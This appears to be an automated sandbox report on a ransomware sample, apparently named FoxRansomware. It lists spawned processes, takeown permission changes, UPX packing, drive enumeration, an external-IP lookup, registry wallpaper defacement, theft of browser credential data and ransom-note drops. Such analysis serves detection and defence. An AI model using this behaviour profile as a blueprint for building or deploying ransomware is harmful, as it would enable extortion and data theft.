941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.execmd.exesOCkujKF.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

pid	process
2148	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
2148	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
3952	cmd.exe
852	sOCkujKF.exe
2016	cmd.exe
3252	cmd.exe
1588	cmd.exe
2292	cmd.exe
1468	cmd.exe
1704	cmd.exe
1724	cmd.exe
1112	cmd.exe
3240	cmd.exe
3172	cmd.exe
3800	cmd.exe
3024	cmd.exe
4284	cmd.exe
4232	cmd.exe
4400	cmd.exe
4352	cmd.exe
4540	cmd.exe
4488	cmd.exe
4648	cmd.exe
4600	cmd.exe
4780	cmd.exe
4724	cmd.exe
4896	cmd.exe
4836	cmd.exe
5004	cmd.exe
4960	cmd.exe
2600	cmd.exe
5076	cmd.exe
2236	cmd.exe
3044	cmd.exe
2828	cmd.exe
3412	cmd.exe
1792	cmd.exe
3724	cmd.exe
3992	cmd.exe
2692	cmd.exe
1816	cmd.exe
1960	cmd.exe
3816	cmd.exe
3852	cmd.exe
2076	cmd.exe
2620	cmd.exe
1628	cmd.exe
1708	cmd.exe
1696	cmd.exe
3544	cmd.exe
2240	cmd.exe
3948	cmd.exe
3248	cmd.exe
2256	cmd.exe
3268	cmd.exe
2060	cmd.exe
1824	cmd.exe
312	cmd.exe
1156	cmd.exe
3140	cmd.exe
3524	cmd.exe
1688	cmd.exe
2724	cmd.exe
3768	cmd.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	process
2764	takeown.exe
3532
1688	takeown.exe
3208
4768	takeown.exe
4380	takeown.exe
4724	takeown.exe
108	takeown.exe
2888	takeown.exe
4900	takeown.exe
4532	takeown.exe
5096	takeown.exe
2192	takeown.exe
3840	takeown.exe
4056	takeown.exe
4612
3844	takeown.exe
3840
5108	takeown.exe
864	takeown.exe
3580	takeown.exe
2628	takeown.exe
4696	takeown.exe
2212	takeown.exe
564	takeown.exe
3572	takeown.exe
4204	takeown.exe
2176	takeown.exe
3268	takeown.exe
3572	takeown.exe
1176
3632	takeown.exe
2604	takeown.exe
1664	takeown.exe
2084	takeown.exe
1520	takeown.exe
4572	takeown.exe
1592	takeown.exe
1176	takeown.exe
2248	takeown.exe
776	takeown.exe
2624	takeown.exe
2104	takeown.exe
1532	takeown.exe
2256	takeown.exe
4912
1152	takeown.exe
1588	takeown.exe
4932	takeown.exe
3328	takeown.exe
4140	takeown.exe
1404	takeown.exe
812	takeown.exe
4996	takeown.exe
3816	takeown.exe
3908	takeown.exe
2628	takeown.exe
332	takeown.exe
4312
3288	takeown.exe
4828	takeown.exe
1008	takeown.exe
3936	takeown.exe
2272	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe	upx
behavioral11/memory/852-1628-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/1176-4582-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/1176-4580-0x0000000000400000-0x0000000000477000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe	upx
behavioral11/memory/2412-4397-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/2632-4885-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/1588-4882-0x00000000002A0000-0x0000000000317000-memory.dmp	upx
behavioral11/memory/2268-4889-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/3232-4923-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/852-4965-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/2316-4973-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/3104-5195-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/2088-5496-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/2236-5941-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/1952-5958-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/776-6393-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/776-6392-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/3544-6437-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/4292-7885-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/4324-7888-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/4428-7898-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/4456-7901-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/4548-7907-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/4572-7911-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/4656-7915-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/4688-7921-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/4788-7929-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/4808-7932-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/4904-7938-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/4928-7942-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/5012-7947-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/5044-7952-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/3276-7955-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/1144-7956-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/3996-7962-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/3964-7963-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/2372-7966-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/2412-7967-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/2412-7968-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/3368-7971-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/108-7972-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/2112-7978-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/1884-7980-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/1536-7984-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/692-7985-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/3836-7987-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/1420-7989-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/712-7993-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/2548-7994-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/3920-7995-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/3912-7996-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/2672-8001-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/528-8003-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/968-8004-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/2516-8006-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/1912-8009-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/1112-8010-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/1112-8011-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/440-8012-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/2596-8013-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/2876-8017-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/3324-8018-0x0000000000400000-0x0000000000477000-memory.dmp	upx
behavioral11/memory/2304-8020-0x0000000000400000-0x0000000000477000-memory.dmp	upx

Drops desktop.ini file(s) 40 IoCs

Processes:

941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

description	ioc	process
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Chess\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Mahjong\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\ETVASUKU\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Videos\Sample Videos\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\2188SAD3\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Hearts\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\DRPRFCEW\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Favorites\Links for United States\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Music\Sample Music\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Purble Place\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\97G4C1D4\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\Solitaire\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Users\Public\desktop.ini	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

Enumerates connected drives 3 TTPs 44 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exesOCkujKF64.exe

description	ioc	process
File opened (read-only)	\??\G:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\E:	sOCkujKF64.exe
File opened (read-only)	\??\G:	sOCkujKF64.exe
File opened (read-only)	\??\R:	sOCkujKF64.exe
File opened (read-only)	\??\V:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\U:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\S:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\K:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\S:	sOCkujKF64.exe
File opened (read-only)	\??\W:	sOCkujKF64.exe
File opened (read-only)	\??\Q:	sOCkujKF64.exe
File opened (read-only)	\??\Y:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\O:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\I:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\L:	sOCkujKF64.exe
File opened (read-only)	\??\T:	sOCkujKF64.exe
File opened (read-only)	\??\T:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\L:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\H:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\K:	sOCkujKF64.exe
File opened (read-only)	\??\Y:	sOCkujKF64.exe
File opened (read-only)	\??\Z:	sOCkujKF64.exe
File opened (read-only)	\??\X:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\R:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\J:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\A:	sOCkujKF64.exe
File opened (read-only)	\??\W:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\Q:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\O:	sOCkujKF64.exe
File opened (read-only)	\??\X:	sOCkujKF64.exe
File opened (read-only)	\??\P:	sOCkujKF64.exe
File opened (read-only)	\??\V:	sOCkujKF64.exe
File opened (read-only)	\??\N:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\M:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\B:	sOCkujKF64.exe
File opened (read-only)	\??\J:	sOCkujKF64.exe
File opened (read-only)	\??\Z:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\I:	sOCkujKF64.exe
File opened (read-only)	\??\N:	sOCkujKF64.exe
File opened (read-only)	\??\U:	sOCkujKF64.exe
File opened (read-only)	\??\P:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\E:	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened (read-only)	\??\H:	sOCkujKF64.exe
File opened (read-only)	\??\M:	sOCkujKF64.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

8 myexternalip.com

flow	ioc
8	myexternalip.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1603059206-2004189698-4139800220-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\IhklkhQE.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

Processes:

941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_ja_4.4.0.v20140623020002.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt_0.12.1.v20140903-1023.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Reunion	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-multitabs_ja.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\jfr\profile.jfc	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UCT	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPHandle.png	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Etc\GMT-10	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Microsoft Games\FreeCell\FreeCellMCE.png	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-ui.xml	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\plugin.properties	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Mozilla Firefox\browser\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jre7\lib\cmm\CIEXYZ.pf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Mahjong\ja-JP\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\UnprotectUse.hta	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application_5.5.0.165303.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\AcroRead.msi	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\lua\playlist\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\feature.xml	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\bundles.info	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-selector-api.xml	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\Microsoft Games\Minesweeper\de-DE\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text_3.9.1.v20140827-1810.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec64.exe	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\sl.pak	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Belem	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\playlist\rockbox_fm_presets.luac	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\reflow.api	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File created	C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\#KOK8_README#.rtf	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zy______.pfm	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-editor-mimelookup-impl.jar	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-host-views.xml	941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
